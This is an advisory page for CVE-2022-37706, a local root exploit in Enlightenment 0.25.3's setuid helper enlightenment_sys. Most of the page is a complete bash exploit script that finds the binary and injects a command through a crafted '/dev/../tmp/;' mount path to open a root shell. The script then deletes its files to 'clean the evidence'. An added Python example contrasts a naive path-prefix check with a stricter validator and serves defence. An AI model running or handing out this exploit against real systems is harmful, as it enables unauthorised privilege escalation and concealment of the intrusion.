Enlightenment 0.25.3 Privilege Escalation
Authored by nu11secur1ty

Enlightenment version 0.25.3 suffers from a local privilege escalation vulnerability.

advisories | CVE-2022-37706
SHA-256 | e93489fd26e004d0d8880e5321f8ef4bf09f86a9c280083061f1af59051648cf
## Title: Enlightenment Version: 0.25.3 LPE
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## Description:
Enlightenment version 0.25.3 is vulnerable to local privilege escalation.
enlightenment_sys in Enlightenment before 0.25.4 allows local users to
gain privileges because it is setuid root and the system library function
mishandles pathnames that begin with a /dev/.. substring.
An attacker with local access to a machine on which Enlightenment is installed
can use this vulnerability to gain root privileges.
## STATUS: CRITICAL Vulnerability
## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```
[+] Exploit:
```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take a few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evidence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
```
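The description says the setuid helper only checks that a pathname begins with /dev/, and the mount argument in the script above shows what slips through such a test. As an added illustration (not the advisory's or Enlightenment's own code; the two validator functions are hypothetical), the Python below contrasts that prefix test with a canonicalising, character-whitelisting check that rejects the path form used here:

```python
#!/usr/bin/env python3
"""Added example: why a textual '/dev/' prefix test is not a device-path check.

The advisory states that enlightenment_sys accepts pathnames that merely begin
with "/dev/" and hands them to a system library function, so a string such as
"/dev/../tmp/;/tmp/exploit" passes the test while naming a path outside /dev
and carrying a shell metacharacter. The validators below are hypothetical and
are not Enlightenment's code.
"""
import os
import re

# Device path taken from the exploit script above (constructed sample input).
EXPLOIT_PATH = "/dev/../tmp/;/tmp/exploit"

# One path component: letters, digits, '_', '.', '-' only; no shell metacharacters.
_COMPONENT = r"[A-Za-z0-9_.-]+"
_DEVICE_RE = re.compile(rf"/dev/{_COMPONENT}(?:/{_COMPONENT})*")


def naive_is_device_path(path: str) -> bool:
    """The insufficient check: a string prefix comparison and nothing else."""
    return path.startswith("/dev/")


def strict_is_device_path(path: str) -> bool:
    """Canonicalise, confine to /dev, then whitelist the characters.

    os.path.normpath collapses '.' and '..' lexically, so "/dev/../tmp/x"
    becomes "/tmp/x" before the prefix test runs. On a real host also resolve
    symlinks (os.path.realpath) first, and never splice the result into a
    shell command string: pass it as its own argv element instead.
    """
    canonical = os.path.normpath(path)
    if not canonical.startswith("/dev/"):
        return False
    return _DEVICE_RE.fullmatch(canonical) is not None


def compare(paths):
    """Return {path: (naive_verdict, strict_verdict)} for a list of candidates."""
    return {p: (naive_is_device_path(p), strict_is_device_path(p)) for p in paths}


if __name__ == "__main__":
    samples = [EXPLOIT_PATH, "/dev/sdb1", "/dev/disk/by-label/USB",
               "/dev/sdb1;id", "/dev/", "/dev/sdb1/../../etc/passwd"]
    for p, (naive, strict) in compare(samples).items():
        print(f"{p!r:35} prefix-check={naive!s:5} strict={strict}")
```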
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Proof and Exploit:
[href](https://streamable.com/zflbgg)
## Time spent
`01:00:00`